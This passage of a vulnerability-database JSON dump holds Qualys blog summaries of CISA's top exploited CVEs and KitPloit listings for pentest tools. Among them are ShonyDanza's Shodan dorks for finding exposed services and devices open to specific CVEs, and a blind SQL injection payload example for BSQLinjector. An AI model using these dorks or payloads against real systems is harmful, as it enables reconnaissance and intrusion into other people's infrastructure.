victim to hide activity among legitimate user traffic.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-26T20:20:32", "type": "qualysblog", "title": "Russia-Ukraine Crisis: How to Strengthen Your Security Posture to Protect against Cyber Attack, based on CISA Guidelines", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-10149", "CVE-2019-11510", "CVE-2019-1653", "CVE-2019-19781", "CVE-2019-2725", "CVE-2019-7609", "CVE-2019-9670", "CVE-2020-0688", "CVE-2020-1472", "CVE-2020-14882", "CVE-2020-4006", "CVE-2020-5902", "CVE-2021-26855", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2022-02-26T20:20:32", "id": "QUALYSBLOG:01C65083E501A6BAFB08FCDA1D561012", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-11T05:29:14", "description": "_The U.S. Cybersecurity & Infrastructure Security Agency has published its report on the top exploited vulnerabilities of 2021. This blog summarizes the report\u2019s findings and how you can use Qualys VMDR to automatically detect and remediate these risks in your enterprise environment._\n\nThe Cybersecurity & Infrastructure Security Agency (CISA) releases [detailed alerts](<https://www.cisa.gov/uscert/ncas/alerts>) of critical vulnerabilities and threats when warranted. These alerts cover the most exploited security vulnerabilities and provide critical insights into the type, nature, and vendor product affected, as well as recommended mitigations that enterprise IT/security professionals can take to reduce their risk.\n\nTo that end, CISA has released its [2021 Top Routinely Exploited Vulnerabilities Report](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>). It provides in-depth details of each exploited CVE, including which threat actors aggressively targeted both public and private sector organizations worldwide. It also provides mitigation guidance for all the top vulnerabilities.\n\nOf special interest in the report is this key finding by CISA:\n\n_Globally, in 2021, malicious cyber actors targeted internet-facing systems, such as email servers and virtual private network (VPN) servers, with exploits of newly disclosed vulnerabilities. For most of the top exploited vulnerabilities, researchers or other actors released proof of concept (POC) code within two weeks of the vulnerability's disclosure, likely facilitating exploitation by a broader range of malicious actors._\n\n### CISA\u2019s Top 15 Routinely Exploited Vulnerabilities of 2021\n\nThe top 15 routine vulnerability exploits observed by cybersecurity authorities in the U.S., Australia, Canada, New Zealand, and the U.K. are:\n\nCVE| Vulnerability Name| Vendor and Product| Type \n---|---|---|--- \n[CVE-2021-44228](<https://nvd.nist.gov/vuln/detail/CVE-2021-44228>)| [Log4Shell](<https://www.qualys.com/log4shell-cve-2021-44228/>) | Apache Log4j| Remote code execution (RCE) \n[CVE-2021-40539](<https://nvd.nist.gov/vuln/detail/CVE-2021-40539>)| | Zoho ManageEngine AD SelfService Plus| RCE \n[CVE-2021-34523](<https://nvd.nist.gov/vuln/detail/CVE-2021-34523>)| ProxyShell| Microsoft Exchange Server| Elevation of privilege \n[CVE-2021-34473](<https://nvd.nist.gov/vuln/detail/CVE-2021-34473>)| ProxyShell| Microsoft Exchange Server| RCE \n[CVE-2021-31207](<https://nvd.nist.gov/vuln/detail/CVE-2021-31207>)| ProxyShell| Microsoft Exchange Server| Security feature bypass \n[CVE-2021-27065](<https://nvd.nist.gov/vuln/detail/CVE-2021-27065>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26858](<https://nvd.nist.gov/vuln/detail/CVE-2021-26858>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26857](<https://nvd.nist.gov/vuln/detail/CVE-2021-26857>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26855](<https://nvd.nist.gov/vuln/detail/CVE-2021-26855>)| [ProxyLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2021/03/03/microsoft-exchange-server-zero-days-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Exchange Server| RCE \n[CVE-2021-26084](<https://nvd.nist.gov/vuln/detail/CVE-2021-26084>)| | Atlassian Confluence Server and Data Center| Arbitrary code execution \n[CVE-2021-21972](<https://nvd.nist.gov/vuln/detail/CVE-2021-21972>)| | VMware vSphere Client| RCE \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)| [ZeroLogon](<https://blog.qualys.com/vulnerabilities-threat-research/2020/09/15/microsoft-netlogon-vulnerability-cve-2020-1472-zerologon-automatically-discover-prioritize-and-remediate-using-qualys-vmdr>)| Microsoft Netlogon Remote Protocol (MS-NRPC)| Elevation of privilege \n[CVE-2020-0688](<https://nvd.nist.gov/vuln/detail/CVE-2020-0688>)| | Microsoft Exchange Server| RCE \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)| | Pulse Secure Pulse Connect Secure| Arbitrary file reading \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>)| | Fortinet FortiOS and FortiProxy| Path traversal \n \n### Highlights of Top Vulnerabilities Cited in CISA 2021 Report\n\nBased on the analysis of this report by the Qualys Research Team, let\u2019s review a few of the top vulnerabilities on the 2021 list and our recommendations for how Qualys enterprise customers can detect and respond to them.\n\n#### Log4Shell Vulnerability\n\nThe Log4Shell vulnerability **(CVE-2021-44228)** was disclosed in December 2021. It was widely exploited by sending a specially crafted code string, which allowed an attacker to execute arbitrary Java code on the server and take complete control of the system. Thousands of products used Log4Shell and were vulnerable to the Log4Shell exploitation.\n\nVisit the [Qualys Log4Shell website](<https://www.qualys.com/log4shell-cve-2021-44228/>) for full details on our response to this threat.\n\n### ProxyShell: Multiple Vulnerabilities\n\nThe multiple vulnerabilities called ProxyShell **(CVE-2021-34523, CVE-2021-34473, CVE-2021-31207)** affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination (i.e., via "vulnerability chaining") enables a remote actor to execute arbitrary code and privilege escalation.\n\n### ProxyLogon: Multiple Vulnerabilities\n\nThe multiple vulnerabilities named ProxyLogon **(CVE-2021-26855, CVE-2021-26858, CVE-2021-26857, CVE-2021-27065)** also affect Microsoft Exchange email servers. Successful exploitation of these vulnerabilities in combination allows an unauthenticated threat actor to execute arbitrary code on vulnerable Exchange Servers, which enables the attacker to gain persistent access to files, mailboxes, and credentials stored on the servers.\n\n[Read our blog](<https://blog.qualys.com/product-tech/2021/03/10/security-advisory-mitigating-the-risk-of-microsoft-exchange-zero-day-proxylogon-vulnerabilities>) on this threat.\n\n#### Confluence Server and Data Center Vulnerability\n\nAn Object Graph Navigation Library injection vulnerability **(CVE-2021-26084)** exists in Confluence Server that could allow an authenticated user, and in some instances an unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.\n\n#### Top Vulnerabilities of 2020 Persist\n\nThree additional vulnerabilities **(CVE-2020-1472, CVE-2018-13379, CVE-2019-11510)** were part of the routinely exploited [top vulnerabilities of 2020](<https://www.cisa.gov/uscert/ncas/alerts/aa21-209a>) list but continued to be exploited well into 2021.\n\n### How Can Qualys Help?\n\nThe Qualys Research Team stays on top of CISA\u2019s vulnerability reports by mapping and releasing our QIDs as needed. The goal is to provide our enterprise customers with complete visibility into risk across their organizations.\n\n#### Detect CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\n[Qualys VMDR](<https://www.qualys.com/apps/vulnerability-management-detection-response/>) provides coverage for all 15 vulnerabilities described in the CISA report. [Qualys Patch Management](<https://www.qualys.com/apps/patch-management/>) can automatically patch all Windows-related vulnerabilities which account for 60% of the 15 vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities. Organizations can quickly reduce the risk from these vulnerabilities.\n\nUsing VMDR and Qualys Query Language (QQL) lets you easily detect all your assets that are vulnerable to the top 15.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nView vulnerabilities be severity in Qualys VMDR\n\nQualys Unified Dashboard provides a comprehensive view of the top 15 exploited vulnerabilities as they affect your entire enterprise environment. The dashboard allows the security team to keep track of each vulnerability as they may propagate across multiple assets in your infrastructure.\n\nDashboard CISA: Alert (AA22-117A) | Top 15 Routinely Exploited\n\nQualys Unified Dashboard\n\n#### Prioritize CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys VMDR makes it easy to prioritize the top 15 exploited vulnerabilities affecting your company\u2019s internet-facing assets. To do so, apply the tag \u201cInternet Facing Assets\u201d in the Prioritization tab. You can add tags like "Cloud Environments", "Type: Servers", "Web Servers", and "VMDR-Web Servers" to increase your scope of assets.\n\nUse this QQL statement:\n \n \n vulnerabilities.vulnerability.cveIds:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nPrioritizing vulnerabilities for remediation in Qualys VMDR\n\n#### Remediate CISA Top 15 Exploited Vulnerabilities using Qualys VMDR\n\nQualys Patch Management offers out-of-the-box support for patching multiple CISA vulnerabilities. Patch Management also provides patches for many Microsoft, Linux, and third-party application vulnerabilities.\n\nTo view the patchable QIDs, enable the "Show only Patchable" toggle button. After that, you can configure the patch job to patch the relevant QIDs and their respective associated CVEs.\n\nUsing Qualys Patch Management to apply patches\n\nQualys Patch Management also provides the ability to deploy custom patches. The flexibility to customize patch deployment allows you to patch all the remaining CVEs in your patching to-do list.\n\nTo get a view of all available patches for CISA\u2019s top 15 exploitable vulnerabilities of 2021, go to the Patch Management application and run this QQL statement in the Patches tab:\n \n \n cve:[`CVE-2021-44228`, `CVE-2021-40539`, `CVE-2021-34523`, `CVE-2021-34473`, `CVE-2021-31207`, `CVE-2021-27065`, `CVE-2021-26858`, `CVE-2021-26857`, `CVE-2021-26855`, `CVE-2021-26084`, `CVE-2021-21972`, `CVE-2020-1472`, `CVE-2020-0688`, `CVE-2019-11510`, `CVE-2018-13379`]\n\nViewing available patches in Qualys Patch Management\n\nFor additional patch details about vulnerabilities reported by CISA, please see the [Appendix](<https://www.cisa.gov/uscert/ncas/alerts/aa22-117a>) of the CISA report.\n\n### Getting Started\n\nReady to get started? Learn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-05-06T12:19:24", "type": "qualysblog", "title": "CISA Alert: Top 15 Routinely Exploited Vulnerabilities", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2020-0688", "CVE-2020-1472", "CVE-2021-21972", "CVE-2021-26084", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065", "CVE-2021-31207", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-40539", "CVE-2021-44228"], "modified": "2022-05-06T12:19:24", "id": "QUALYSBLOG:CAF5B766E6B0E6C1A5ADF56D442E7BB2", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kitploit": [{"lastseen": "2022-04-07T12:01:24", "description": "[](<https://blogger.googleusercontent.com/img/a/AVvXsEjG7AfpHcNjkzZMtvplE2bYVsPCgZ1wyo5jesct_CsGBPhciWCUWFhqC4SLSNboL7iPTWtI0RpGyHZQCbSylFXDC1py1fWqO3vCbpVdYDcHTRT2va2EUO1Vp9dPAgOP6FamNin8VZZdxS42vTbMMddcAUnuN5AAWWwfJDH2pfpmQhjA5RV51QbUk8BqJQ=s586>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n\ndictionary below to add it to your shonydanza stock searches menu #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) STOCK_SEARCHES = { 'ANONYMOUS_FTP':'ftp anonymous ok', 'RDP':'port:3389 has_screenshot:true', 'OPEN_TELNET':'port:23 [console](<https://www.kitploit.com/search/label/Console> \"console\" ) [gateway](<https://www.kitploit.com/search/label/Gateway> \"gateway\" ) -password', 'APACHE_DIR_LIST':'http.title:\"Index of /\"', 'SPRING_BOOT':'http.favicon.hash:116323821', 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', 'DOCKER_API':'\"Docker Containers:\" port:2375', 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' } #OPTIONAL #IP or cidr range constraint for searches that return list of IP addresses #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) #NET_RANGE = '0.0.0.0/0' \">\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of /\"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-27T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-27T20:30:00", "id": "KITPLOIT:4707889613618662864", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to_01477721372.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-07T12:01:27", "description": "[](<https://3.bp.blogspot.com/-HfvtRTCYnTM/YZ3QJbhSs3I/AAAAAAAA4AU/kC3BBy581dgTiAKCIDOlmGtohgCXuQhlgCK4BGAYYCw/s1600/ShonyDanza_1_shonydanza_demo-780791.gif>)\n\n \n\n\nA customizable, easy-to-navigate tool for researching, pen testing, and defending with the power of Shodan.\n\n \n\n\nWith ShonyDanza, you can:\n\n * Obtain IPs based on search criteria\n * Automatically exclude honeypots from the results based on your pre-configured thresholds\n * Pre-configure all IP searches to filter on your specified net range(s)\n * Pre-configure search limits\n * Use build-a-search to craft searches with easy building blocks\n * Use stock searches and pre-configure your own stock searches\n * Check if IPs are known [malware](<https://www.kitploit.com/search/label/Malware> \"malware\" ) C2s\n * Get host and domain profiles\n * Scan on-demand\n * Find exploits\n * Get total counts for searches and exploits\n * Automatically save exploit code, IP lists, host profiles, domain profiles, and scan results to directories within ShonyDanza\n\n## Installation\n\n`git clone https://github.com/fierceoj/ShonyDanza.git` \n\n\n> Requirements\n\n * python3\n * shodan library\n\n`cd ShonyDanza` \n`pip3 install -r requirements.txt`\n\n## Usage\n\n> Edit config.py to include your desired configurations \n`cd configs` \n`sudo nano config.py` \n\n \n \n #config file for shonydanza searches \n \n #REQUIRED \n #maximum number of results that will be returned per search \n #default is 100 \n \n SEARCH_LIMIT = 100 \n \n \n #REQUIRED \n #IPs exceeding the honeyscore limit will not show up in IP results \n #scale is 0.0 to 1.0 \n #adjust to desired probability to restrict results by threshold, or keep at 1.0 to include all results \n \n HONEYSCORE_LIMIT = 1.0 \n \n \n #REQUIRED - at least one key: value pair \n #add a shodan dork to the dictionary below to add it to your shonydanza stock searches menu \n #see https://github.com/jakejarvis/awesome-shodan-queries for a great source of queries \n #check into \"vuln:\" filter if you have Small Business Plan or higher (e.g., vuln:cve-2019-11510) \n \n STOCK_SEARCHES = { \n 'ANONYMOUS_FTP':'ftp anonymous ok', \n 'RDP':'port:3389 has_screenshot:true', \n 'OPEN_TELNET':'port:23 console gateway -password', \n 'APACHE_DIR_LIST':'http.title:\"Index of / \"', \n 'SPRING_BOOT':'http.favicon.hash:116323821', \n 'HP_PRINTERS':'\"Serial Number:\" \"Built:\" \"Server: HP HTTP\"', \n 'DOCKER_API':'\"Docker Containers:\" port:2375', \n 'ANDROID_ROOT_BRIDGE':'\"Android Debug Bridge\" \"Device\" port:5555', \n 'MONGO_EXPRESS_GUI':'\"Set-Cookie: mongo-express=\" \"200 OK\"', \n 'CVE-2019-11510_PULSE_VPN':'http.html:/dana-na/', \n 'CVE-2019-19781_CITRIX_NETSCALER':'http.waf:\"Citrix NetScaler\"', \n 'CVE-2020-5902_F5_BIGIP':'http.favicon.hash:-335242539 \"3992\"', \n 'CVE-2020-3452_CISCO_ASA_FTD':'200 \"Set-Cookie: webvpn;\"' \n } \n \n \n #OPTIONAL \n #IP or cidr range constraint for searches that return list of IP addresses \n #use comma-separated list to designate multiple (e.g. 1.1.1.1,2.2.0.0/16,3.3.3.3,3.3.3.4) \n \n #NET_RANGE = '0.0.0.0/0' \n \n\n> Run \n`cd ../` \n`python3 shonydanza.py` \n\n\nSee this [how-to article](<https://null-byte.wonderhowto.com/forum/to-use-shonydanza-find-target-and-exploit-0318883/> \"how-to article\" ) for additional usage instruction.\n\n## Legal Disclaimer\n\nThis project is made for educational and ethical [testing](<https://www.kitploit.com/search/label/Testing> \"testing\" ) purposes only. Usage of ShonyDanza for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.\n\n \n \n\n\n**[Download ShonyDanza](<https://github.com/fierceoj/ShonyDanza> \"Download ShonyDanza\" )**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-01T20:30:00", "type": "kitploit", "title": "ShonyDanza - A Customizable, Easy-To-Navigate Tool For Researching, Pen Testing, And Defending With The Power Of Shodan", "bulletinFamily": "tools", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-19781", "CVE-2020-3452", "CVE-2020-5902"], "modified": "2021-12-01T20:30:00", "id": "KITPLOIT:4421457840699592233", "href": "http://www.kitploit.com/2021/12/shonydanza-customizable-easy-to.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-12-01T09:22:38", "description": "[  ](<https://4.bp.blogspot.com/-_LIRipoS9bk/VpATQiSNwcI/AAAAAAAAFEQ/-RhBm7m5NuE/s1600/penbox.png>)\n\n \n** PenBox ** \nA Penetration Testing Framework , The Hacker's Repo our hope is in the last version we will have evry script that a hacker needs :) \n \n** Requirements ** \n\n\n * Python 2 \n * sudoer \n \n** Versions ** \nVersion v1.1 : \n \n** Drupal_Hacking : ** \n\n\n * 1): Drupal Bing Exploiter \n * 2): Get Drupal Websites \n * 3): Drupal Mass Exploiter \n\n** Privat_Tools: **\n\n * 1) Get all websites \n * 2) Get joomla websites \n * 3) Get wordpress websites \n * 4) Find control panel \n * 5) Find zip files \n * 6) Find upload files \n * 7) Get server users \n * 8) Scan from SQL injection \n * 9) Crawl and scan from SQL injection \n * 10) Scan ports (range of ports) \n * 11) Scan ports (common ports) \n * 12) Get server banner \n * 13) Bypass Cloudflare \n\n** OS_System: **\n\n * 1) Mac OSX \n * 2) Linux ( root required ) \n * 3) Windows ( not available \"yet\" ) \n\n** Other_tools: **\n\n * jboss-autopwn \n * sqlmap \n * Shellnoob \n * Inurlbr \n * nmap \n * Setoolkit \n * Port Scanning \n * Host To IP \n * Cupp \n * Ncrack \n * Reaver \n * Ssltrip version v1.0 : \n * added some tools \n * fixed some errors \n * optimised menus and submenus \n \n** OS ** \n\n\n * This Tool Only Works On Linux And OSx \n \n \n\n\n** [ Download Penbox ](<https://github.com/x3omdax/PenBox>) **\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2018-08-26T17:08:46", "type": "kitploit", "title": "Penbox - A Tool That Has All The Tools, Penetration Tester'S Repo", "bulletinFamily": "tools", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379"], "modified": "2018-08-26T17:08:46", "id": "KITPLOIT:763105754466120590", "href": "http://www.kitploit.com/2016/01/penbox-tool-that-has-all-tools.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-12-02T21:52:59", "description": "[  ](<https://1.bp.blogspot.com/-nsWPZmYADO0/Vo9KdyeALAI/AAAAAAAAFBo/Bo1VqnKaOXA/s1600/BSQLinjector.png>)\n\n \n\n\nBSQLinjector uses blind method to retrieve data from SQL databases. I recommend using \"--test\" switch to clearly see how configured payload looks like before sending it to an application. \n\n \n\n\n** Options: **\n\n \n\n\n\\--file Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt) \n\n \n\n\n\\--pattern Mandatory - Pattern to look for when query is true. (--pattern=truestatement) \n\n \n\n\n\\--prepend Mandatory - Main payload. (--prepend=\"abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,\" \n \n\\--append How to end our payload. For example comment out rest of SQL statement. (--append='# \n\n \n\n\n\\--2ndfile File containing valid HTTP request used 